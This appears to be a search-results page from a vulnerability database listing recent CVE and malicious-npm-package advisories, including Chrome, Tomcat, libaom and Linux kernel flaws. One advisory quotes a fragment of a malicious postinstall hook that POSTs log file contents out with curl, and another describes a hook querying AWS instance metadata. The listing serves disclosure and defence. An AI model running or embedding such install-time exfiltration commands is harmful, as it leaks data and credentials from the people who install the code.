Lucene search
+L

12699 matches found

Debian CVE
Debian CVE
added 2026/06/30 10:38 p.m.5 views

CVE-2026-13887

Inappropriate implementation in NFC in Google Chrome on Android prior to 150.0.7871.47 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. Chromium security severity: Medium...

6.5CVSS5.8AI score0.00233EPSS
Exploits0
Cvelist
Cvelist
added 2026/06/30 10:38 p.m.28 views

CVE-2026-13887

Inappropriate implementation in NFC in Google Chrome on Android prior to 150.0.7871.47 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. Chromium security severity: Medium...

0.00233EPSS
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/30 9:37 a.m.8 views

Malicious code in ripshakti1 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 764edbf390c427ef99a9d9164034b966fbac251f00240bbb219825c0c92422a6 package.json declares a preinstall lifecycle hook node index.js that auto-executes on npm install. index.js queries the AWS EC2 instance metadata...

5.8AI score
Exploits0References1
EUVD
EUVD
added 2026/06/30 9:37 a.m.9 views

EUVD-2026-40275

PROMOD V is using insecure HTTP communication instead of HTTPS. The vulnerability is due to the lack of HTTPS support from 3rd party Digipede server...

7CVSS5.8AI score0.00347EPSS
Exploits0References1
Cvelist
Cvelist
added 2026/06/30 9:37 a.m.33 views

CVE-2026-10763

PROMOD V is using insecure HTTP communication instead of HTTPS. The vulnerability is due to the lack of HTTPS support from 3rd party Digipede server...

7CVSS0.00347EPSS
Exploits0References1
RedhatCVE
RedhatCVE
added 2026/06/30 3:2 a.m.13 views

CVE-2026-55955

A flaw was found in Apache Tomcat. An improper authentication vulnerability in the EncryptionInterceptor component allows a remote attacker to perform a replay attack. This could lead to unauthorized access or manipulation of data within the cluster component. Mitigation This vulnerability only...

6.5CVSS5.8AI score0.0028EPSS
Exploits0References4
Positive Technologies
Positive Technologies
added 2026/06/30 12:0 a.m.11 views

PT-2026-54164

Name of the Vulnerable Software and Affected Versions Google Chrome on Android versions prior to 150.0.7871.47 Description An inappropriate implementation in the Near Field Communication NFC component allows a remote attacker who has already compromised the renderer process to leak cross-origin...

9.8CVSS6AI score0.00413EPSS
Exploits0References447
OSV
OSV
added 2026/06/29 9:39 p.m.6 views

CVE-2026-10647 Deadlock denial of service in USB CDC-NCM device class on TX enqueue failure

The USB CDC-NCM device class subsys/usb/devicenext/class/usbdcdcncm.c ignores the return value of usbdepenqueue in its ethernet transmit callback cdcncmsend. When the enqueue fails, the function still calls ksemtake&data-syncsem, KFOREVER, blocking on a completion semaphore that is only ever...

5.3CVSS6.2AI score0.00134EPSS
Exploits1References5
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/29 4:50 p.m.9 views

Malicious code in @live-backstage-im/communication-chat (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware ad217e6f53767b755ad267a2052b4bc35add8ba6cdb6532dfec034c83e3d3426 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
CVE
CVE
added 2026/06/29 8:5 a.m.20 views

CVE-2026-22078

CVE-2026-22078 concerns O+ Connect where an unauthenticated IPC service allows a local attacker to escalate privileges via the IPC channel. The root cause is lack of client authentication on the IPC interface, enabling external applications to perform sensitive actions with elevated privileges. T...

7.3CVSS5.8AI score0.00089EPSS
Exploits0References1
Cvelist
Cvelist
added 2026/06/29 8:5 a.m.42 views

CVE-2026-22078 O+ Connect's lack of authentication for IPC channels led to a local privilege escalation vulnerability.

Because O+ Connect's IPC service does not authenticate clients, external applications can escalate privileges and perform sensitive actions through the IPC channel...

7.3CVSS0.00089EPSS
Exploits0References1
ATTACKERKB
ATTACKERKB
added 2026/06/29 8:5 a.m.9 views

CVE-2026-22078

Because O+ Connect's IPC service does not authenticate clients, external applications can escalate privileges and perform sensitive actions through the IPC channel...

7.3CVSS5.8AI score0.00089EPSS
Exploits0References2Affected Software1
EUVD
EUVD
added 2026/06/29 8:5 a.m.8 views

EUVD-2026-40052

Because O+ Connect's IPC service does not authenticate clients, external applications can escalate privileges and perform sensitive actions through the IPC channel...

7.3CVSS5.8AI score0.00089EPSS
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/29 4:0 a.m.9 views

Malicious code in eslint-commit-parser (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5fc51e200a141d1dbbb4f7eb9e5e3dec18507572e5dc9562278713c554fad195 The package is published under the name eslint-commit-parser but its contents are a verbatim copy of the supertest HTTP-testing library — package.jso...

5.8AI score
Exploits0References1
RedHat Linux
RedHat Linux
added 2026/06/28 10:34 p.m.2 views

libaom: libaom: heap buffer overflow in AV1 encoder first-pass stats buffer via LAP mode

A heap buffer overflow vulnerability was found in libaom, the reference AV1 codec implementation. A flaw in the AV1 encoder's Look-Ahead Processing LAP mode causes the first-pass stats ring buffer wrap-around guard to be bypassed when glaginframes is set to 1 or higher. This results in a 232-byte...

7.6CVSS6.2AI score0.00275EPSS
Exploits0References6
Microsoft CVE
Microsoft CVE
added 2026/06/27 8:16 a.m.9 views

ipc/shm: serialize orphan cleanup with shm_nattch updates

...

5.5CVSS5.8AI score0.00114EPSS
Exploits0
Fedora
Fedora
added 2026/06/27 12:56 a.m.5 views

[SECURITY] Fedora 43 Update: nginx-mod-modsecurity-1.0.4-12.fc43

The ModSecurity-nginx connector is the connection point between nginx and libmodsecurity ModSecurity v3. Said another way, this project provides a communication channel between nginx and libmodsecurity. This connector is required to use LibModSecurity with nginx. The ModSecurity-nginx connector...

9.2CVSS7AI score0.03552EPSS
Exploits4
RedhatCVE
RedhatCVE
added 2026/06/25 9:55 p.m.10 views

CVE-2026-52993

A flaw was found in the Linux kernel's Transparent Inter-Process Communication TIPC module. This vulnerability, a double-free, occurs when the tipcbufappend function incorrectly handles memory after a socket buffer skb reallocation. An attacker could potentially exploit this to cause system...

9.8CVSS6.2AI score0.00359EPSS
Exploits0References4
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 10:51 a.m.15 views

Malicious code in dttsdee (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 56d01c47d29d1f8f25a737be42dd77d02a2c13a00afb808740142197a79150e9 package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$cat /data/logs/monitor-2026-06-25.log"...

6AI score
Exploits0References1
Cvelist
Cvelist
added 2026/06/25 8:39 a.m.36 views

CVE-2026-53202 accel/ivpu: Fix signed integer truncation in IPC receive

In the Linux kernel, the following vulnerability has been resolved: accel/ivpu: Fix signed integer truncation in IPC receive Fix potential buffer overflow where firmware-supplied datasize is cast to signed int before being used in mint. Large unsigned values = 0x80000000 become negative, causing...

7.8CVSS0.00153EPSS
Exploits0References4
Rows per page
Query Builder